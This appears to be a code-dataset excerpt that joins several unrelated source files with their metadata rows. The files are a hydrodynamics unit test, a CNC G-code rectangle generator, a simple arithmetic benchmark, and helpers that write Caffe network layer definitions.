domain.set_quantity('friction', 0)
R = Reflective_boundary(domain)
domain.set_boundary( {'left': R, 'right': R, 'bottom': R, 'top': R} )
from pprint import pprint
#pprint(domain.quantities['stage'].centroid_values)
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
# Apply operator to these triangles
def elev(t):
if t < 10.0:
return 5.0
else:
return 7.0
operator = Set_elevation_operator(domain, elevation=elev, center=[1.0,1.0], radius=1.0)
# Apply Operator at time t=1.0
domain.set_time(1.0)
operator()
#pprint(domain.quantities['elevation'].centroid_values)
elev_ex = [ 0., 0., 5., 5., 5., 5., 5., 5., 5., 5., 5., 5., 0.,
5., 5., 0., 5., 5., 5., 5., 5., 5., 5., 5., 5., 5.,
5., 5., 5., 5., 5., 5., 5., 5., 5., 5., 5., 5., 5.,
5., 5., 5., 5., 5., 5., 5., 5., 5., 5., 0., 0., 5.,
5., 5., 5., 5., 5., 5., 5., 5., 5., 5., 0., 0.]
#pprint(domain.quantities['stage'].centroid_values)
stage_ex = [ 1., 1., 6., 6., 6., 6., 6., 6., 6., 6., 6., 6., 1.,
6., 6., 1., 6., 6., 6., 6., 6., 6., 6., 6., 6., 6.,
6., 6., 6., 6., 6., 6., 6., 6., 6., 6., 6., 6., 6.,
6., 6., 6., 6., 6., 6., 6., 6., 6., 6., 1., 1., 6.,
6., 6., 6., 6., 6., 6., 6., 6., 6., 6., 1., 1.]
# from pprint import pprint
# pprint (domain.quantities['elevation'].centroid_values)
# pprint (domain.quantities['stage'].centroid_values)
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
# Apply Operator at time t=15.0
domain.set_time(15.0)
operator()
#pprint(domain.quantities['elevation'].centroid_values)
elev_ex = [ 0., 0., 7., 7., 7., 7., 7., 7., 7., 7., 7., 7., 0.,
7., 7., 0., 7., 7., 7., 7., 7., 7., 7., 7., 7., 7.,
7., 7., 7., 7., 7., 7., 7., 7., 7., 7., 7., 7., 7.,
7., 7., 7., 7., 7., 7., 7., 7., 7., 7., 0., 0., 7.,
7., 7., 7., 7., 7., 7., 7., 7., 7., 7., 0., 0.]
#pprint(domain.quantities['stage'].centroid_values)
stage_ex = [ 1., 1., 8., 8., 8., 8., 8., 8., 8., 8., 8., 8., 1.,
8., 8., 1., 8., 8., 8., 8., 8., 8., 8., 8., 8., 8.,
8., 8., 8., 8., 8., 8., 8., 8., 8., 8., 8., 8., 8.,
8., 8., 8., 8., 8., 8., 8., 8., 8., 8., 1., 1., 8.,
8., 8., 8., 8., 8., 8., 8., 8., 8., 8., 1., 1.]
# from pprint import pprint
# pprint (domain.quantities['elevation'].centroid_values)
# pprint (domain.quantities['stage'].centroid_values)
# pprint (domain.quantities['xmomentum'].centroid_values)
# pprint (domain.quantities['ymomentum'].centroid_values)
assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
operator = Set_elevation(domain, elevation=0.0)
#print operator.value_type
operator()
#from pprint import pprint
# pprint (domain.quantities['elevation'].centroid_values)
# pprint (domain.quantities['stage'].centroid_values)
# pprint (domain.quantities['xmomentum'].centroid_values)
# pprint (domain.quantities['ymomentum'].centroid_values)
assert num.allclose(domain.quantities['elevation'].centroid_values, 0.0)
assert num.allclose(domain.quantities['stage'].centroid_values, 1.0)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
operator = Set_elevation(domain, elevation=lambda t: t, indices = [0,1,3])
operator()
#pprint (domain.quantities['elevation'].centroid_values)
#pprint (domain.quantities['stage'].centroid_values)
elev_ex = [ 15., 15., 0., 15., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0.]
stage_ex = [ 16., 16., 1., 16., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1.]
# from pprint import pprint
# pprint (domain.quantities['elevation'].centroid_values)
# pprint (domain.quantities['stage'].centroid_values)
# pprint (domain.quantities['xmomentum'].centroid_values)
# pprint (domain.quantities['ymomentum'].centroid_values)
assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
if __name__ == "__main__":
suite = unittest.makeSuite(Test_set_elevation_operator, 'test')
runner = unittest.TextTestRunner(verbosity=1)
runner.run(suite)
| 38.488432 | 104 | 0.517633 | 5,908 | 44,916 | 3.831077 | 0.030467 | 0.058673 | 0.072767 | 0.090837 | 0.946187 | 0.94548 | 0.922904 | 0.921313 | 0.909826 | 0.902403 | 0 | 0.124955 | 0.319374 | 44,916 | 1,166 | 105 | 38.521441 | 0.61542 | 0.217918 | 0 | 0.827018 | 0 | 0 | 0.033411 | 0 | 0 | 0 | 0 | 0 | 0.151565 | 1 | 0.032949 | false | 0.003295 | 0.062603 | 0 | 0.120264 | 0.004942 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b65482f03079ee98c4ede7fb5e2dc6af3116de2a | 16,363 | py | Python | gcode_contour_rectangles.py | mrRobot62/gcodebuilder | beeaedaa4ae8719044dfff0c3a7bff01c206a341 | [
"MIT"
] | null | null | null | gcode_contour_rectangles.py | mrRobot62/gcodebuilder | beeaedaa4ae8719044dfff0c3a7bff01c206a341 | [
"MIT"
] | null | null | null | gcode_contour_rectangles.py | mrRobot62/gcodebuilder | beeaedaa4ae8719044dfff0c3a7bff01c206a341 | [
"MIT"
] | null | null | null | from gcode import GCode, UnseenFormatter
import numpy as np
class GCode_Contour_Rectangle(GCode):
""" create a sharp cornerd rectangle """
def __init__ (self, cfg, version="GCode_Contour_Rectange V0.1"):
super().__init__(cfg, version)
@staticmethod
def createRectangle(self, x, y, depth, w, h, f, indent=3, helical=True):
"""create a rectant from position x/y with width and height and a depth for z of f
Args:
x ([type]): [start postion]
y ([type]): [start position]
z ([array]): [start_depth, end_depth, depth_step]
w ([type]): [width ]
h ([type]): [height]
f ([type]): [movement speed]
indent (int, optional): [description]. Defaults to 3.
"""
x = round(float(x),4)
y = round(float(y),4)
z_offset = [0,0,0,0]
z = depth[0]
if depth[1] - depth[0] <= 0.0:
z_offset = [depth[1],depth[1],depth[1],depth[1]]
elif helical and depth[1] > 0.0:
o = (depth[1]-depth[0]) / 4.0
z_offset = np.arange (start=depth[0]+o,stop=depth[1], step=o)
z_offset = np.append(z_offset, depth[1])
self.addGCode(self._cfg.GCODES['lin_move_xyzf'], args={'x':f"{x:.4f}", 'y':f"{(y+h):.4f}", 'z':f"{-z_offset[0]:.4f}", 'feed': f}, indent=indent )
self.addGCode(self._cfg.GCODES['lin_move_xyzf'], args={'x':f"{x+w:.4f}",'y':f"{(y+h):.4f}", 'z':f"{-z_offset[1]:.4f}", 'feed': f}, indent=indent )
self.addGCode(self._cfg.GCODES['lin_move_xyzf'], args={'x':f"{x+w:.4f}",'y':f"{(y):.4f}", 'z':f"{-z_offset[2]:.4f}", 'feed': f}, indent=indent )
self.addGCode(self._cfg.GCODES['lin_move_xyzf'], args={'x':f"{x:.4f}", 'y':f"{(y):.4f}", 'z':f"{-z_offset[3]:.4f}", 'feed': f}, indent=indent )
@staticmethod
def helicalRecHole(self, xy, ab, wh, td, f, depth, contour='on', dir='CW'):
"""
cut a rectangle hole with a width(w) and height(h). XY is the lower left corner to start
Args:
xy (float tuple): (x,y)
ab (float tuple): (distance from 0,0 to cp 2, only used if cp = 0)
wh ([float tuple]): [(width, height)]
td ([float]): [tool diameter]
f ([int]): [feed/speed]
cp ([int]): [center point (0,1,2)]
depth (float tuple) : (depth_total, depth_step)
contour (str, optional): [description]. Defaults to 'on'.
dir (str, optional): [description]. Defaults to 'CW'.
"""
# Step 1: starting xy position is allways lower left corner
#
if self.cp == '0' :
# cutter is on machines 0/0 position
xy[0] += ab[0]
xy[1] += ab[1]
elif self.cp == '1':
# center of rectangle
xy[0] -= (wh[0] / 2)
xy[1] -= (wh[1] / 2)
dr = self.getDepthStepRangeArray(depth)
comment = f"-- helical rectangle start --"
last_z = 0
self.addComment(comment, leadingBlank=True, endingBlank=True)
if contour == 'outside':
xy[0] -= (td / 2.0)
xy[1] -= (td / 2.0)
wh[0] += td # if we cut outside, width of rectangle is tool_diameter wider
wh[1] += td # if we cut outside, height of rectangle is tool_diameter wider
pass
elif contour == 'inside':
xy[0] += (td / 2.0) # move
xy[1] += (td / 2.0)
wh[0] -= td # if we cut outside, width of rectangle is tool_diameter smaller
wh[1] -= td # if we cut outside, height of rectangle is tool_diameter smaller
pass
else:
# 'on'
pass
pass
#
# (loop)
self.addGCode(self._cfg.GCODES['spindle_cw'])
self.addGCode(self._cfg.GCODES['spindle_speed'],args={'speed':self.speed })
self.addGCode(self._cfg.GCODES['feed_change'],args={'feed':self.rapid_move_xy })
comment = f"Start milling"
self.addComment(comment, leadingBlank=True, endingBlank=True)
#
# Go to start position
self.addGCode(self._cfg.GCODES['rapid_move_zf'], args={'z':self.z_safety, 'feed':self.rapid_move_z})
self.addGCode(self._cfg.GCODES['rapid_move_xyf'],args={'x':xy[0], 'y':xy[1], 'feed':self.rapid_move_xy})
#
# Start milling
self.addGCode(self._cfg.GCODES['lin_move_zf'],args={'z':abs(self.z_start), 'feed':self.lin_move_z})
comment = f"-- loop --"
self.addComment(comment, leadingBlank=True, endingBlank=True)
last_z = 0
self.addGCode(self._cfg.GCODES['lin_move_xyzf'],args={'x':xy[0], 'y':xy[1], 'z':-0, 'feed': self.lin_move_xy}, indent=3 )
for z in dr:
comment = f"-- depth {z} --"
self.addComment(comment, leadingBlank=True, endingBlank=True)
if self.dir == 'CW':
self.createRectangle(self, x=xy[0], y=xy[1], depth=[last_z, z, self.depth_step], w=wh[0], h=wh[1], f=f, indent=3)
last_z = z
pass
comment = f"-- endloop --"
self.addComment(comment, leadingBlank=True, endingBlank=True)
#self.createRectangle(self, x=xy[0], y=xy[1], depth=[last_z,self.depth_total, self.depth_step], w=wh[0], h=wh[1], f=f, indent=3, helical=False)
def generateGcode(self, data):
"""[summary]
{'pre_gcode': 'G90 G64 G17 G40 G49', 'post_gcode': 'G00 Z10 F100 M2',
'center_point': '1',
'unit': 'mm', 'direction': 'CCW',
'cutter_compensation': 'on', 'depth_step': '0.5', 'depth_total': '33',
'feed_g00_xy': '600', 'feed_g00_z': '400', 'feed_g01_xy': '300', 'feed_g01_z': '15',
'z_start': '3.0', 'z_safety': '15.0',
'tool_dia':'3.0',
'tool_id' : '1',
'speed' : '20000',
---- specific from project -----
'width' : '20',
'height' : '10'
}
Args:
data ([type]): [description]
"""
width = float(data['width'])
height = float(data['height'])
xy = [0,0]
(xy, tool_comp, range) = self.addStandardGCodes(
data,
comments= {
"intro" : {
"text" : 'GCode_Contour_Rectangle. Version {0} - {1}',
"args" : [
"V0.1",
"12-2021"
]
},
"c1" : {
"text" : 'Rectangle with a width of {0} and a height of {2}{1}, milling contour {3}, cutting direction {3}',
"args" : [
width,
data['unit'] ,
height,
data['cutter_compensation'],
data['direction']
]
}
}
)
# call static method, note: it's important to send current object as well to method
self.helicalRecHole( self,
xy=xy,
ab=[self.center_offset_x, self.center_offset_y],
wh=[width, height],
td=self.tool_dia,
f=self.lin_move_xy,
depth=[self.depth_total, self.depth_step],
contour=self.contour,
dir=self.dir
)
pass
pass
class GCode_Contour_RoundedRectangle(GCode):
""" create a sharp cornerd rectangle """
def __init__ (self, cfg, version="GCode_Contour_Rectange V0.1"):
super().__init__(cfg, version)
@staticmethod
def createRoundedRectangle(self, x, y, depth, w, h, r, f, indent=3, helical=True):
"""create a rectant from position x/y with width and height and a depth for z of f
Args:
x ([type]): [start postion]
y ([type]): [start position]
z ([array]): [start_depth, end_depth, depth_step]
w ([type]): [width ]
h ([type]): [height]
f ([type]): [movement speed]
indent (int, optional): [description]. Defaults to 3.
"""
x = round(float(x),4)
y = round(float(y),4)
z_offset = [0,0,0,0,0,0,0,0]
z = depth[0]
if depth[1] - depth[0] <= 0.0:
z_offset = [depth[1],depth[1],depth[1],depth[1],depth[1],depth[1],depth[1],depth[1]]
elif helical and depth[1] > 0.0:
o = (depth[1]-depth[0]) / 8.0
z_offset = np.arange (start=depth[0]+o,stop=depth[1], step=o)
z_offset = np.append(z_offset, depth[1])
# start point
self.addGCode(self._cfg.GCODES['lin_move_xyzf'], args={'x':f"{x:.4f}", 'y':f"{y:.4f}",
'z':f"{-z_offset[0]:.4f}", 'feed': f}, indent=indent )
# 1. edge lower left; positiv I<value>
x = w / 2.0
y = h / 2.0 - r
self.addGCode(self._cfg.GCODES['arc_int_cw_xyjz'], args={'x':f"{-x:.4f}", 'y':f"{-y:.4f}",
'j':f"{abs(r):.4f}", 'z':f"{-z_offset[0]:.4f}"}, indent=indent )
# 2. G01
self.addGCode(self._cfg.GCODES['lin_move_xyz'], args={'x':f"{-x:.4f}", 'y':f"{abs(y):.4f}",
'z':f"{-z_offset[1]:.4f}"}, indent=indent )
# 3. G02 edge upper left
x = w / 2.0 - r
y = h / 2.0
self.addGCode(self._cfg.GCODES['arc_int_cw_xyiz'], args={'x':f"{-x:.4f}", 'y':f"{abs(y):.4f}",
'i':f"{abs(r):.4f}", 'z':f"{-z_offset[2]:.4f}"}, indent=indent )
# 4. G01
self.addGCode(self._cfg.GCODES['lin_move_xyz'], args={'x':f"{abs(x):.4f}", 'y':f"{abs(y):.4f}",
'z':f"{-z_offset[3]:.4f}"}, indent=indent )
# 5. G02 edge upper right
x = w / 2.0
y = h / 2.0 - r
self.addGCode(self._cfg.GCODES['arc_int_cw_xyjz'], args={'x':f"{x:.4f}", 'y':f"{y:.4f}",
'j':f"{-r:.4f}", 'z':f"{-z_offset[4]:.4f}"}, indent=indent )
# 6. G01
self.addGCode(self._cfg.GCODES['lin_move_xyz'], args={'x':f"{abs(x):.4f}", 'y':f"{-y:.4f}",
'z':f"{-z_offset[5]:.4f}"}, indent=indent )
# 7. G02 edge lower right
x = w / 2 - r
y = h / 2
self.addGCode(self._cfg.GCODES['arc_int_cw_xyiz'], args={'x':f"{x:.4f}", 'y':f"{-y:.4f}",
'i':f"{-r:.4f}", 'z':f"{-z_offset[6]:.4f}"}, indent=indent )
# 8. G01
self.addGCode(self._cfg.GCODES['lin_move_xyz'], args={'x':f"{-x:.4f}", 'y':f"{-y:.4f}",
'z':f"{-z_offset[7]:.4f}"}, indent=indent )
@staticmethod
def helicalRoundedRecHole(self, xy, ab, wh, td, r, f, depth, contour='on', dir='CW'):
"""
cut a rectangle hole with a width(w) and height(h). XY is the lower left corner to start
Args:
xy (float tuple): (x,y)
ab (float tuple): (distance from 0,0 to cp 2, only used if cp = 0)
wh ([float tuple]): [(width, height)]
td ([float]): [tool diameter]
r ([float]): [edge radius]
f ([int]): [feed/speed]
cp ([int]): [center point (0,1,2)]
depth (float tuple) : (depth_total, depth_step)
contour (str, optional): [description]. Defaults to 'on'.
dir (str, optional): [description]. Defaults to 'CW'.
"""
# Step 1: starting xy position is allways lower left corner
#
# Math
# a = width, b=height, r=radius
# Example a=10, b=6, r=2.8)
# ( x= b/2-r => x = 6 / 2 = 3 - 2.8 = 0.2 )
# ( G01 X0.2 Y....)
# ( y= a/2-r => y = 10 / 2 = 5 - 2.8 = 2.2 )
# G02 X0.2 Y2.2
if self.cp == '0' :
# cutter is on machines 0/0 position
xy[0] += ab[0]
xy[1] += ab[1]
elif self.cp == '1':
# center of rectangle
xy[0] -= (wh[0] / 2) - r
xy[1] -= (wh[1] / 2)
dr = self.getDepthStepRangeArray(depth)
comment = f"-- helical rounded rectangle start --"
last_z = 0
self.addComment(comment, leadingBlank=True, endingBlank=True)
if contour == 'outside':
xy[0] -= (td / 2.0)
xy[1] -= (td / 2.0)
wh[0] += td # if we cut outside, width of rectangle is tool_diameter wider
wh[1] += td # if we cut outside, height of rectangle is tool_diameter wider
pass
elif contour == 'inside':
xy[0] += (td / 2.0) # move
xy[1] += (td / 2.0)
wh[0] -= td # if we cut outside, width of rectangle is tool_diameter smaller
wh[1] -= td # if we cut outside, height of rectangle is tool_diameter smaller
pass
else:
# 'on'
pass
pass
#
# (loop)
self.addGCode(self._cfg.GCODES['spindle_cw'])
self.addGCode(self._cfg.GCODES['spindle_speed'],args={'speed':self.speed })
self.addGCode(self._cfg.GCODES['feed_change'],args={'feed':self.rapid_move_xy })
comment = f"Start milling"
self.addComment(comment, leadingBlank=True, endingBlank=True)
#
# Go to start position
self.addGCode(self._cfg.GCODES['rapid_move_zf'], args={'z':self.z_safety, 'feed':self.rapid_move_z})
self.addGCode(self._cfg.GCODES['rapid_move_xyf'],args={'x':xy[0], 'y':xy[1], 'feed':self.rapid_move_xy})
#
# Start milling
self.addGCode(self._cfg.GCODES['lin_move_zf'],args={'z':abs(self.z_start), 'feed':self.lin_move_z})
comment = f"-- loop --"
self.addComment(comment, leadingBlank=True, endingBlank=True)
last_z = 0
for z in dr:
comment = f"-- depth {z} --"
self.addComment(comment, leadingBlank=True, endingBlank=True)
if self.dir == 'CW':
self.createRoundedRectangle(self, x=xy[0], y=xy[1], depth=[last_z, z, self.depth_step], w=wh[0], h=wh[1], r=r, f=f, indent=3)
last_z = z
pass
comment = f"-- endloop --"
self.addComment(comment, leadingBlank=True, endingBlank=True)
#self.createRectangle(self, x=xy[0], y=xy[1], depth=[last_z,self.depth_total, self.depth_step], w=wh[0], h=wh[1], f=f, indent=3, helical=False)
def generateGcode(self, data):
"""[summary]
{'pre_gcode': 'G90 G64 G17 G40 G49', 'post_gcode': 'G00 Z10 F100 M2',
'center_point': '1',
'unit': 'mm', 'direction': 'CCW',
'cutter_compensation': 'on', 'depth_step': '0.5', 'depth_total': '33',
'feed_g00_xy': '600', 'feed_g00_z': '400', 'feed_g01_xy': '300', 'feed_g01_z': '15',
'z_start': '3.0', 'z_safety': '15.0',
'tool_dia':'3.0',
'tool_id' : '1',
'speed' : '20000',
---- specific from project -----
'width' : '20',
'height' : '10'
}
Args:
data ([type]): [description]
"""
width = float(data['width'])
height = float(data['height'])
radius = float(data['radius'])
xy = [0,0]
(xy, tool_comp, range) = self.addStandardGCodes(
data,
comments= {
"intro" : {
"text" : 'GCode_Contour_RoundedRectangle. Version {0} - {1}',
"args" : [
"V0.1",
"12-2021"
]
},
"c1" : {
"text" : 'Rounded rectangle with a width of {0} and a height of {2}{1} and edge radius {3}',
"args" : [
width,
data['unit'] ,
height,
radius
]
}
}
)
# call static method, note: it's important to send current object as well to method
self.helicalRoundedRecHole( self,
xy=xy,
ab=[self.center_offset_x, self.center_offset_y],
wh=[width, height],
td=self.tool_dia,
r=radius,
f=self.lin_move_xy,
depth=[self.depth_total, self.depth_step],
contour=self.contour,
dir=self.dir
)
pass
pass
| 40.007335 | 154 | 0.495264 | 2,166 | 16,363 | 3.630656 | 0.0988 | 0.024924 | 0.052899 | 0.062818 | 0.90234 | 0.897126 | 0.887589 | 0.882121 | 0.877416 | 0.875636 | 0 | 0.041346 | 0.333374 | 16,363 | 408 | 155 | 40.105392 | 0.679593 | 0.271344 | 0 | 0.692308 | 0 | 0.008547 | 0.144207 | 0.008824 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034188 | false | 0.059829 | 0.008547 | 0 | 0.051282 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
fcb7b5ebf3e5ac6c01b98df1a86ed8714090d032 | 48 | py | Python | __init__.py | pnarvor/nephelae_mapping | 498c04a165ee9163c749a3f47bea6028494fc3f4 | [
"BSD-3-Clause"
] | null | null | null | __init__.py | pnarvor/nephelae_mapping | 498c04a165ee9163c749a3f47bea6028494fc3f4 | [
"BSD-3-Clause"
] | null | null | null | __init__.py | pnarvor/nephelae_mapping | 498c04a165ee9163c749a3f47bea6028494fc3f4 | [
"BSD-3-Clause"
] | null | null | null | from . import database
from . import gprmapping
| 16 | 24 | 0.791667 | 6 | 48 | 6.333333 | 0.666667 | 0.526316 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 48 | 2 | 25 | 24 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
fcf974da5994cd824e4d35f340092dd91a73470c | 1,199 | py | Python | tests/perf/test-assign-add.py | jacobmarshall-etc/duktape | 62ef74d0dd64edcd518c588dd88780ea4312144a | [
"MIT"
] | null | null | null | tests/perf/test-assign-add.py | jacobmarshall-etc/duktape | 62ef74d0dd64edcd518c588dd88780ea4312144a | [
"MIT"
] | null | null | null | tests/perf/test-assign-add.py | jacobmarshall-etc/duktape | 62ef74d0dd64edcd518c588dd88780ea4312144a | [
"MIT"
] | null | null | null | def test():
a = 10
b = 20
i = 0
while i < 1e7:
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
i += 1
test()
| 29.975 | 55 | 0.275229 | 314 | 1,199 | 1.050955 | 0.038217 | 0.606061 | 0.909091 | 1.2 | 0.909091 | 0.909091 | 0.909091 | 0.909091 | 0.909091 | 0.909091 | 0 | 0.012862 | 0.481234 | 1,199 | 39 | 56 | 30.74359 | 0.517685 | 0 | 0 | 0.740741 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0 | 0 | 0.037037 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
fcffe9826b59909fdd2d536ee14e090b7e69d81e | 28,394 | py | Python | scripts/pyproto.py | tushar00jain/cvpr18_rnn_deblur_matcaffe | a978a15b331e8b44fa92c4c83256169a66b197fd | [
"MIT"
] | 32 | 2018-09-06T14:37:26.000Z | 2022-01-11T13:20:17.000Z | scripts/pyproto.py | tushar00jain/cvpr18_rnn_deblur_matcaffe | a978a15b331e8b44fa92c4c83256169a66b197fd | [
"MIT"
] | 4 | 2018-09-18T03:06:56.000Z | 2021-12-03T10:42:14.000Z | scripts/pyproto.py | tushar00jain/cvpr18_rnn_deblur_matcaffe | a978a15b331e8b44fa92c4c83256169a66b197fd | [
"MIT"
] | 9 | 2018-09-22T03:02:18.000Z | 2021-06-15T12:07:35.000Z |
import os
import sys
def get_pad(name='',bottom='',top='',pad_h=0,pad_w=0):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'Pad'+'"\n'
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' pad_param {\n'
ss += ' pad_h:'+str(pad_h)+'\n'
ss += ' pad_w:'+str(pad_w)+'\n'
ss+= ' }\n}\n'
return ss
def get_resize(name='',bottom='',top='',resize_type='',resize_ratio=1):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'Resize'+'"\n'
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' resize_param {\n'
ss += ' type:'+resize_type+'\n'
ss += ' resize_ratio:'+str(resize_ratio)+'\n'
ss+= ' }\n}\n'
return ss
def get_slice(name='',bottom='',top='',slice_point=1,slice_dim=1):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'Slice'+'"\n'
ss += ' bottom:"'+bottom+'"\n'
if type(top) == list:
for t in top:
ss += ' top:"'+t+'"\n'
else:
ss += ' top:"'+top+'"\n'
ss += ' slice_param {\n'
ss += ' slice_dim:'+str(slice_dim)+'\n'
if type(slice_point) == list:
for s in slice_point:
ss += ' slice_point:'+str(s)+'\n'
else:
ss += ' slice_point:'+str(s)+'\n'
ss+= ' }\n}\n'
return ss
def get_crop(name='',bottom='',top='',croptype='',crop_w=0,crop_h=0,point_fix_w=0,point_fix_h=0):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'Crop'+'"\n'
if type(bottom) == list:
for b in bottom:
ss += ' bottom:"'+b+'"\n'
else:
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' crop_param {\n'
ss += ' type:'+croptype+'\n'
ss += ' crop_w:'+str(crop_w)+'\n'
ss += ' crop_h:'+str(crop_h)+'\n'
ss += ' point_fix_w:'+str(point_fix_w)+'\n'
ss += ' point_fix_h:'+str(point_fix_h)+'\n'
ss+= ' }\n}\n'
return ss
def get_flatten(name='',bottom='',top=''):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'Flatten'+'"\n'
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n}\n'
return ss
def get_l2(name='',bottom='',top=''):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'L2Norm'+'"\n'
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n}\n'
return ss
def get_dropout(name='',bottom='',top='',dropout_ratio=0.5):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'Dropout'+'"\n'
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' dropout_param {\n'
ss += ' dropout_ratio:'+str(dropout_ratio)+'\n'+' }\n}\n'
return ss
def get_fc(name='',bottom='',top='',numoutput=1):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'InnerProduct'+'"\n'
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' param {\n\
lr_mult: 1\n \
decay_mult: 1\n }\n param {\n \
lr_mult: 2\n \
decay_mult: 0\n }\n'
ss += ' inner_product_param {\n'
ss += ' num_output:'+str(numoutput)+'\n'
ss += ' weight_filler {\n\
type: "xavier"\n\
std: 0.03\n }\n bias_filler {\n\
type: "constant"\n\
value: 0\n }\n }\n}\n'
return ss
def get_eltwise(name='',bottom='',top='',typename='SUM'):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'Eltwise'+'"\n'
for b in bottom:
ss += ' bottom:"'+b+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' eltwise_param {\n operation:'+typename+'\n }\n}\n'
return ss
def get_concat(name='',bottom='',top='',concat_dim=1):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'Concat'+'"\n'
for b in bottom:
ss += ' bottom:"'+b+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' concat_param {\n'
ss += ' concat_dim:'+str(concat_dim)+'\n'
ss += ' }\n'
ss+='}\n'
return ss
